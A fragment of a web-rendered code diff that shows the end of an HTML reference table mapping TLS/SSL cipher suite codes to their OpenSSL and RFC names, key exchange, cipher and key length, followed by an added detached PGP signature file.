<tr><td> [0xc019]</td><td> AECDH-AES256-SHA </td><td> ECDH </td><td> AES </td><td> 256 </td><td> TLS_ECDH_anon_WITH_AES_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc01a]</td><td> SRP-3DES-EDE-CBC-SHA </td><td> SRP </td><td> 3DES </td><td> 168 </td><td> TLS_SRP_SHA_WITH_3DES_EDE_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc01b]</td><td> SRP-RSA-3DES-EDE-CBC-SHA </td><td> SRP </td><td> 3DES </td><td> 168 </td><td> TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc01c]</td><td> SRP-DSS-3DES-EDE-CBC-SHA </td><td> SRP </td><td> 3DES </td><td> 168 </td><td> TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc01d]</td><td> SRP-AES-128-CBC-SHA </td><td> SRP </td><td> AES </td><td> 128 </td><td> TLS_SRP_SHA_WITH_AES_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc01e]</td><td> SRP-RSA-AES-128-CBC-SHA </td><td> SRP </td><td> AES </td><td> 128 </td><td> TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc01f]</td><td> SRP-DSS-AES-128-CBC-SHA </td><td> SRP </td><td> AES </td><td> 128 </td><td> TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc020]</td><td> SRP-AES-256-CBC-SHA </td><td> SRP </td><td> AES </td><td> 256 </td><td> TLS_SRP_SHA_WITH_AES_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc021]</td><td> SRP-RSA-AES-256-CBC-SHA </td><td> SRP </td><td> AES </td><td> 256 </td><td> TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc022]</td><td> SRP-DSS-AES-256-CBC-SHA </td><td> SRP </td><td> AES </td><td> 256 </td><td> TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA </td></tr>
|
||||
<tr><td> [0xc023]</td><td> ECDHE-ECDSA-AES128-SHA256 </td><td> ECDH </td><td> AES </td><td> 128 </td><td> TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 </td></tr>
|
||||
<tr><td> [0xc024]</td><td> ECDHE-ECDSA-AES256-SHA384 </td><td> ECDH </td><td> AES </td><td> 256 </td><td> TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 </td></tr>
|
||||
<tr><td> [0xc025]</td><td> ECDH-ECDSA-AES128-SHA256 </td><td> ECDH/ECDSA</td><td> AES </td><td> 128 </td><td> TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256 </td></tr>
|
||||
<tr><td> [0xc026]</td><td> ECDH-ECDSA-AES256-SHA384 </td><td> ECDH/ECDSA</td><td> AES </td><td> 256 </td><td> TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384 </td></tr>
|
||||
<tr><td> [0xc027]</td><td> ECDHE-RSA-AES128-SHA256 </td><td> ECDH </td><td> AES </td><td> 128 </td><td> TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 </td></tr>
|
||||
<tr><td> [0xc028]</td><td> ECDHE-RSA-AES256-SHA384 </td><td> ECDH </td><td> AES </td><td> 256 </td><td> TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 </td></tr>
|
||||
<tr><td> [0xc029]</td><td> ECDH-RSA-AES128-SHA256 </td><td> ECDH/RSA </td><td> AES </td><td> 128 </td><td> TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256 </td></tr>
|
||||
<tr><td> [0xc02a]</td><td> ECDH-RSA-AES256-SHA384 </td><td> ECDH/RSA </td><td> AES </td><td> 256 </td><td> TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384 </td></tr>
|
||||
<tr><td> [0xc02b]</td><td> ECDHE-ECDSA-AES128-GCM-SHA256</td><td> ECDH </td><td> AESGCM </td><td> 128 </td><td> TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 </td></tr>
|
||||
<tr><td> [0xc02c]</td><td> ECDHE-ECDSA-AES256-GCM-SHA384</td><td> ECDH </td><td> AESGCM </td><td> 256 </td><td> TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 </td></tr>
|
||||
<tr><td> [0xc02d]</td><td> ECDH-ECDSA-AES128-GCM-SHA256 </td><td> ECDH/ECDSA</td><td> AESGCM </td><td> 128 </td><td> TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256 </td></tr>
|
||||
<tr><td> [0xc02e]</td><td> ECDH-ECDSA-AES256-GCM-SHA384 </td><td> ECDH/ECDSA</td><td> AESGCM </td><td> 256 </td><td> TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384 </td></tr>
|
||||
<tr><td> [0xc02f]</td><td> ECDHE-RSA-AES128-GCM-SHA256 </td><td> ECDH </td><td> AESGCM </td><td> 128 </td><td> TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 </td></tr>
|
||||
<tr><td> [0xc030]</td><td> ECDHE-RSA-AES256-GCM-SHA384 </td><td> ECDH </td><td> AESGCM </td><td> 256 </td><td> TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 </td></tr>
|
||||
<tr><td> [0xc031]</td><td> ECDH-RSA-AES128-GCM-SHA256 </td><td> ECDH/RSA </td><td> AESGCM </td><td> 128 </td><td> TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256 </td></tr>
|
||||
<tr><td> [0xc032]</td><td> ECDH-RSA-AES256-GCM-SHA384 </td><td> ECDH/RSA </td><td> AESGCM </td><td> 256 </td><td> TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384 </td></tr>
|
||||
<tr><td> [0xcc13]</td><td> ECDHE-RSA-CHACHA20-POLY1305 </td><td> ECDH </td><td> ChaCha20-Poly1305</td><td> </td><td> TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256</td></tr>
|
||||
<tr><td> [0xcc14]</td><td> ECDHE-ECDSA-CHACHA20-POLY1305</td><td> ECDH </td><td> ChaCha20-Poly1305</td><td> </td><td> TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256</td></tr>
|
||||
<tr><td> [0xcc15]</td><td> DHE-RSA-CHACHA20-POLY1305 </td><td> DH </td><td> ChaCha20-Poly1305</td><td> </td><td> TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256</td></tr>
|
||||
<tr><td> [0xff00]</td><td> GOST-MD5 </td><td> RSA </td><td> unknown </td><td> unknown</td></tr>
|
||||
<tr><td> [0xff01]</td><td> GOST-GOST94 </td><td> RSA </td><td> unknown </td><td> unknown</td></tr>
|
||||
<tr><td> [0x010080]</td><td> RC4-MD5 </td><td> RSA </td><td> RC4 </td><td> 128 </td><td> SSL_CK_RC4_128_WITH_MD5 </td></tr>
|
||||
<tr><td> [0x020080]</td><td> EXP-RC4-MD5 </td><td> RSA(512) </td><td> RC4 </td><td> 40, export </td><td> SSL_CK_RC4_128_EXPORT40_WITH_MD5 </td></tr>
|
||||
<tr><td> [0x030080]</td><td> RC2-CBC-MD5 </td><td> RSA </td><td> RC2 </td><td> 128 </td><td> SSL_CK_RC2_128_CBC_WITH_MD5 </td></tr>
|
||||
<tr><td> [0x040080]</td><td> EXP-RC2-CBC-MD5 </td><td> RSA(512) </td><td> RC2 </td><td> 40, export </td><td> SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5</td></tr>
|
||||
<tr><td> [0x050080]</td><td> IDEA-CBC-MD5 </td><td> RSA </td><td> IDEA </td><td> 128 </td><td> SSL_CK_IDEA_128_CBC_WITH_MD5 </td></tr>
|
||||
<tr><td> [0x060040]</td><td> DES-CBC-MD5 </td><td> RSA </td><td> DES </td><td> 56 </td><td> SSL_CK_DES_64_CBC_WITH_MD5 </td></tr>
|
||||
<tr><td> [0x0700c0]</td><td> DES-CBC3-MD5 </td><td> RSA </td><td> 3DES </td><td> 168 </td><td> SSL_CK_DES_192_EDE3_CBC_WITH_MD5 </td></tr>
|
||||
<tr><td> [0x080080]</td><td> RC4-64-MD5 </td><td> RSA </td><td> RC4 </td><td> 64 </td><td> SSL_CK_RC4_64_WITH_MD5 </td></tr>
|
||||
</table>
|
||||
</body>
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,7 @@
|
|||
-----BEGIN PGP SIGNATURE-----
|
||||
Version: GnuPG v2.0.22 (GNU/Linux)
|
||||
|
||||
iD8DBQBTnflQWZzt6LgYwDkRAvPjAJ0eVYoPO6we7rnD1stNFp4AbPLXTQCgq+75
|
||||
r27Xry6XPYtZq/kur4NR4Pw=
|
||||
=nECU
|
||||
-----END PGP SIGNATURE-----
|
Loading…
Reference in New Issue